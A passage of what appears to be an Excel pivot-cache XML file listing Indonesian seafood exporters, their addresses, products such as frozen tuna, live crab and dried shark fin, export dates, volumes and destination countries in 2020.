    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20316"/>
    <x v="158"/>
    <s v="PT. DUTA BUANA PACIFIC"/>
    <s v="Komplek PPN Tanjungpandan, Jl. RE Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Demersal Beku (Pisang-pisang, Kerapu, Ketarap, Kakap, Ekor Kuning)"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="123000"/>
    <s v="Kota Pangkal Pinang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="19981"/>
    <x v="213"/>
    <s v="CV. MIRANTI"/>
    <s v="Griya Batas Kota Blok D 27 No.10, Kel. Marumpa, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="41760000"/>
    <s v="Kota Jakarta Pusat, Kota Denpasar"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20984"/>
    <x v="214"/>
    <s v="KOPERASI SERBA USAHA SINAR BINTANG TERANG"/>
    <s v="Kampung Bugis, Kel, TPI Kota, Kec, TPI Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Sarden, Selar, Tenggiri)"/>
    <d v="2020-09-15T00:00:00"/>
    <n v="65000"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20985"/>
    <x v="214"/>
    <s v="KOPERASI SERBA USAHA SINAR BINTANG TERANG"/>
    <s v="Kampung Bugis, Kel, TPI Kota, Kec, TPI Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Manyung, Kerapu, Bawal, Kakap, Kaci-kaci)"/>
    <d v="2020-09-15T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20986"/>
    <x v="214"/>
    <s v="KOPERASI SERBA USAHA SINAR BINTANG TERANG"/>
    <s v="Kampung Bugis, Kel. TPI Kota, Kec. TPI Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-09-15T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="17970"/>
    <x v="215"/>
    <s v="PT. PASTI BANGUN JAYA"/>
    <s v="Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Rajungan Beku"/>
    <d v="2020-01-15T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="17971"/>
    <x v="215"/>
    <s v="PT. PASTI BANGUN JAYA"/>
    <s v="Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Rajungan Segar"/>
    <d v="2020-01-15T00:00:00"/>
    <n v="3500"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="19267"/>
    <x v="216"/>
    <s v="PT. BELITUNG BERKAH MANDIRI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Tanjung Pandan, Jl. RE. Martadinata RT 007 RW 004, Kel. Kota, Kec. Tanjung Pandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Demersal Beku (Ekor Kuning)"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="19268"/>
    <x v="216"/>
    <s v="PT. BELITUNG BERKAH MANDIRI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Tanjung Pandan, Jl. RE. Martadinata RT 007 RW 004, Kel. Kota, Kec. Tanjung Pandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="180000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="19269"/>
    <x v="216"/>
    <s v="PT. BELITUNG BERKAH MANDIRI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Tanjung Pandan, Jl. RE. Martadinata RT 007 RW 004, Kel. Kota, Kec. Tanjung Pandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="19270"/>
    <x v="216"/>
    <s v="PT. BELITUNG BERKAH MANDIRI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Tanjung Pandan, Jl. RE. Martadinata RT 007 RW 004, Kel. Kota, Kec. Tanjung Pandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="19271"/>
    <x v="216"/>
    <s v="PT. BELITUNG BERKAH MANDIRI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Tanjung Pandan, Jl. RE. Martadinata RT 007 RW 004, Kel. Kota, Kec. Tanjung Pandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Rajungan Beku"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="50"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="19272"/>
    <x v="216"/>
    <s v="PT. BELITUNG BERKAH MANDIRI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Tanjung Pandan, Jl. RE. Martadinata RT 007 RW 004, Kel. Kota, Kec. Tanjung Pandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Siput Beku"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="50"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20084"/>
    <x v="217"/>
    <s v="CV. LAUT JAYA"/>
    <s v="Kompleks Pelabuhan Perikanan Nusantara Tanjung Pandan Jl. R.E. Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjung Pandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="450000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20085"/>
    <x v="217"/>
    <s v="CV. LAUT JAYA"/>
    <s v="Kompleks Pelabuhan Perikanan Nusantara Tanjung Pandan Jl. R.E. Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjung Pandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20502"/>
    <x v="159"/>
    <s v="PT, NELAYAN MITRA MANDIRI"/>
    <s v="Komplek PPN Tanjungpandan, Jl, RE Martadinata, Kel, Kota, Kec, Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="629284.30000000005"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20642"/>
    <x v="47"/>
    <s v="KOPERASI PERIKANAN MINA RIZKI ABADI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Brondong, Kawasan PPDI RT 01 RW 05 Jompong, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Gresik"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="17041"/>
    <x v="218"/>
    <s v="CV. BINTAN JAYA"/>
    <s v="Kp. Kemboja No.72 RT 01 RW 11, Kec. Tanjungpinang Barat, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Kerang Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="80000"/>
    <s v="Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="17045"/>
    <x v="218"/>
    <s v="CV. BINTAN JAYA"/>
    <s v="Kp. Kemboja No.72 RT 01 RW 11, Kec. Tanjungpinang Barat, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Rajungan Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="17047"/>
    <x v="218"/>
    <s v="CV. BINTAN JAYA"/>
    <s v="Kp. Kemboja No.72 RT 01 RW 11, Kec. Tanjungpinang Barat, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Udang Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="17048"/>
    <x v="218"/>
    <s v="CV. BINTAN JAYA"/>
    <s v="Kp. Kemboja No.72 RT 01 RW 11, Kec. Tanjungpinang Barat, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Sotong, Cumi-cumi)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="17050"/>
    <x v="218"/>
    <s v="CV. BINTAN JAYA"/>
    <s v="Kp. Kemboja No.72 RT 01 RW 11, Kec. Tanjungpinang Barat, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Siput Hidup"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="17051"/>
    <x v="218"/>
    <s v="CV. BINTAN JAYA"/>
    <s v="Kp. Kemboja No.72 RT 01 RW 11, Kec. Tanjungpinang Barat, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Kerang Hidup"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="17052"/>
    <x v="218"/>
    <s v="CV. BINTAN JAYA"/>
    <s v="Kp. Kemboja No.72 RT 01 RW 11, Kec. Tanjungpinang Barat, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="17056"/>
    <x v="218"/>
    <s v="CV. BINTAN JAYA"/>
    <s v="Kp. Kemboja No.72 RT 01 RW 11, Kec. Tanjungpinang Barat, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Daging Kerang Beku"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="17058"/>
    <x v="218"/>
    <s v="CV. BINTAN JAYA"/>
    <s v="Kp. Kemboja No.72 RT 01 RW 11, Kec. Tanjungpinang Barat, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Siput Segar "/>
    <d v="2020-02-10T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="16884"/>
    <x v="219"/>
    <s v="PT. SUMBER MINA BAHARI"/>
    <s v="Jl. Raya Rembang - Tuban Km 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Beku"/>
    <d v="2020-02-27T00:00:00"/>
    <n v="11000"/>
    <m/>
    <s v="Singapore, Thailand"/>
  </r>
  <r>
    <n v="17414"/>
    <x v="195"/>
    <s v="PT. YAKIN PASIFIK TUNA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Lampulo, Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="19655"/>
    <x v="38"/>
    <s v="CV. JAYA SEAFOOD"/>
    <s v="Jl. Syiah Kuala, Kel. Lamdingin, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Fillet Ikan Segar"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20248"/>
    <x v="220"/>
    <s v="PT. DELTA AEROSUPPORT"/>
    <s v="Desa Mindahan RT 02 RW 01, Kec. Batealit, Kabupaten Jepara&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2020-06-09T00:00:00"/>
    <n v="180000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20249"/>
    <x v="220"/>
    <s v="PT. DELTA AEROSUPPORT"/>
    <s v="Desa Mindahan RT 02 RW 01, Kec. Batealit, Kabupaten Jepara&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Segar (Kerapu, Bawal, Kakap, Kuro)"/>
    <d v="2020-06-09T00:00:00"/>
    <n v="180000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20670"/>
    <x v="221"/>
    <s v="CV. BRIGHT OCEAN"/>
    <s v="Jl. Madidir Ure Lingkungan III, Kel. Madidir Ure, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="24000"/>
    <m/>
    <s v="Singapore, Thailand"/>
  </r>
  <r>
    <n v="20671"/>
    <x v="221"/>
    <s v="CV. BRIGHT OCEAN"/>
    <s v="Jl. Madidir Ure Lingkungan III, Kel. Madidir Ure, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Singapore, Thailand"/>
  </r>
  <r>
    <n v="20730"/>
    <x v="105"/>
    <s v="PT. SEAFOOD SAMUDERA PACIFIC"/>
    <s v="Jl. Gabion No.15, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20520"/>
    <x v="110"/>
    <s v="PT. CILACAP SAMUDERA FISHING INDUSTRY"/>
    <s v="Kawasan Pelabuhan PPS Nizam Zachman Blok K 7D, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-05-01T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Thailand"/>
  </r>
  <r>
    <n v="20199"/>
    <x v="36"/>
    <s v="PT. BAHARI BIRU NUSANTARA"/>
    <s v="Jl. Daendels Km 82.6 No.88, Desa Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="20250"/>
    <x v="220"/>
    <s v="PT. DELTA AEROSUPPORT"/>
    <s v="Desa Mindahan RT 02 RW 01, Kec. Batealit, Kabupaten Jepara&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Scallop Segar"/>
    <d v="2020-06-09T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="Malaysia, Thailand"/>
  </r>
  <r>
    <n v="20728"/>
    <x v="105"/>
    <s v="PT. SEAFOOD SAMUDERA PACIFIC"/>
    <s v="Jl. Gabion No.15, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Swanggi, Malong, Gulama, Pisang-pisang, Anggoli, Kerapu, Layur, Beloso, Kakatua, Bawal, Kaca Piring, Perak-perak, Kakap, Baronang, Kurisi, Barramundi)"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="21081"/>
    <x v="222"/>
    <s v="SETIA USAHA"/>
    <s v="Jl. Selumit Pantai RT 21, Kel. Selumit Pantai, Kec. Tarakan Tengah, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Kering"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="96000"/>
    <m/>
    <s v="Malaysia, Thailand"/>
  </r>
  <r>
    <n v="19364"/>
    <x v="1"/>
    <s v="PT. BANYUWANGI CANNERY INDONESIA"/>
    <s v="Jl. Raya Situbondo Km 12,5, Kel. Ketapang, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Masak Beku"/>
    <d v="2020-06-04T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Bitung"/>
    <s v="Algeria, Thailand"/>
  </r>
  <r>
    <n v="20708"/>
    <x v="223"/>
    <s v="PT. INSAN CITRAPRIMA SEJAHTERA"/>
    <s v="Jl. Raya Jenu - Merak Urak No.148 C, Desa Sekardadi, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teri Nasi Kering"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Malang, Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="21180"/>
    <x v="224"/>
    <s v="PT. BINA NELAYAN JAYA"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Sorong, Jl. Cakalang, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="China, Singapore"/>
  </r>
  <r>
    <n v="21240"/>
    <x v="225"/>
    <s v="PT. ROHTADI"/>
    <s v="Jl. Pogidon No. 35 Lingkungan I, Kel. Bailang, Kec. Bunaken, Kota Manado&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="21178"/>
    <x v="224"/>
    <s v="PT. BINA NELAYAN JAYA"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Sorong, Jl. Cakalang, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Layang, Tenggiri)"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Singapore"/>
  </r>
  <r>
    <n v="21179"/>
    <x v="224"/>
    <s v="PT. BINA NELAYAN JAYA"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Sorong, Jl. Cakalang, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Segar (Lencam, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi)"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Singapore"/>
  </r>
  <r>
    <n v="20318"/>
    <x v="226"/>
    <s v="PT. MEGA MANDIRI SURABAYA"/>
    <s v="Jl. Mohammad Noer 162 A, Kel. Bulak, Kec. Bulak, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="20320"/>
    <x v="226"/>
    <s v="PT. MEGA MANDIRI SURABAYA"/>
    <s v="Jl. Mohammad Noer 162 A, Kel. Bulak, Kec. Bulak, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="20321"/>
    <x v="226"/>
    <s v="PT. MEGA MANDIRI SURABAYA"/>
    <s v="Jl. Mohammad Noer 162 A, Kel. Bulak, Kec. Bulak, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="20319"/>
    <x v="226"/>
    <s v="PT. MEGA MANDIRI SURABAYA"/>
    <s v="Jl. Mohammad Noer 162 A, Kel. Bulak, Kec. Bulak, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Pasuruan"/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="19921"/>
    <x v="50"/>
    <s v="PT. MARINDO MAKMUR USAHA JAYA"/>
    <s v="Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Denpasar"/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="20348"/>
    <x v="41"/>
    <s v="CV. BUANA LAUT NUSANTARA"/>
    <s v="Jl. Kima VI Kav F1/B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Bonito, Tongkol, Kuwe, Layaran, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="27364"/>
    <s v="Kota Surabaya"/>
    <s v="Australia, China"/>
  </r>
  <r>
    <n v="17714"/>
    <x v="227"/>
    <s v="CV. ANUGERAH BAHARI FISHERY"/>
    <s v="Jl. Nambangan No.9 RT 006 RW 001, Kel. Tanah Kali Kedinding, Kec. Kenjeran, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Segar (Teri, Lemuru, Tongkol, Cobia, Escolar, Kembung, Lemadang, Marlin, Layaran, Sarden, Cakalang, Tenggiri, Pedang)"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="17715"/>
    <x v="227"/>
    <s v="CV. ANUGERAH BAHARI FISHERY"/>
    <s v="Jl. Nambangan No.9 RT 006 RW 001, Kel. Tanah Kali Kedinding, Kec. Kenjeran, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Teri, Lemuru, Tongkol, Cobia, Kembung, Lemadang, Marlin, Sarden, Selar, Cakalang, Tenggiri)"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="17719"/>
    <x v="227"/>
    <s v="CV. ANUGERAH BAHARI FISHERY"/>
    <s v="Jl. Nambangan No.9 RT 006 RW 001, Kel. Tanah Kali Kedinding, Kec. Kenjeran, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Segar (Barramundi, Malong, Lencam, Biji Nangka, Kuniran, Kerapu, Layur, Kakatua, Bawal, Kakap, Kaci-kaci, Kuro, Kurisi)"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="19876"/>
    <x v="228"/>
    <s v="UD. SISCA"/>
    <s v="Jl. Tukad Yeh Aya No.38, Kel. Panjer, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="20356"/>
    <x v="229"/>
    <s v="PT. PULAU MAS BAHARI"/>
    <s v="Jl. Diponegoro Gang Ulam Kencana No.48B Pesanggaran, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="151105"/>
    <m/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="20869"/>
    <x v="230"/>
    <s v="PT, GOLDENSNACK MAS SEJAHTERA"/>
    <s v="Jl, Taman Industri BSB Blok C1 No,9, Kawasan Industri BSB, Kel, Jatibarang, Kec, Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerupuk Ikan"/>
    <d v="2020-05-28T00:00:00"/>
    <n v="43781.9"/>
    <m/>
    <s v="China, Singapore"/>
  </r>
  <r>
    <n v="20870"/>
    <x v="230"/>
    <s v="PT, GOLDENSNACK MAS SEJAHTERA"/>
    <s v="Jl, Taman Industri BSB Blok C1 No,9, Kawasan Industri BSB, Kel, Jatibarang, Kec, Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerupuk Udang"/>
    <d v="2020-05-28T00:00:00"/>
    <s v="25/12/1900  12,01,00"/>
    <m/>
    <s v="China, Singapore"/>
  </r>
  <r>
    <n v="20643"/>
    <x v="47"/>
    <s v="KOPERASI PERIKANAN MINA RIZKI ABADI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Brondong, Kawasan PPDI RT 01 RW 05 Jompong, Kel, Brondong, Kec, Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Banyuwangi, Kabupaten Pasuruan, Kota Surabaya"/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="20796"/>
    <x v="231"/>
    <s v="PT. WEST IRIAN FISHING INDUSTRIES"/>
    <s v="Jl. Udang No.6 Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Beku"/>
    <d v="2020-06-10T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Timur, Kota Surabaya"/>
    <s v="China, Thailand"/>
  </r>
  <r>
    <n v="16911"/>
    <x v="232"/>
    <s v="PT. MARINA MAKMUR SEJAHTERA"/>
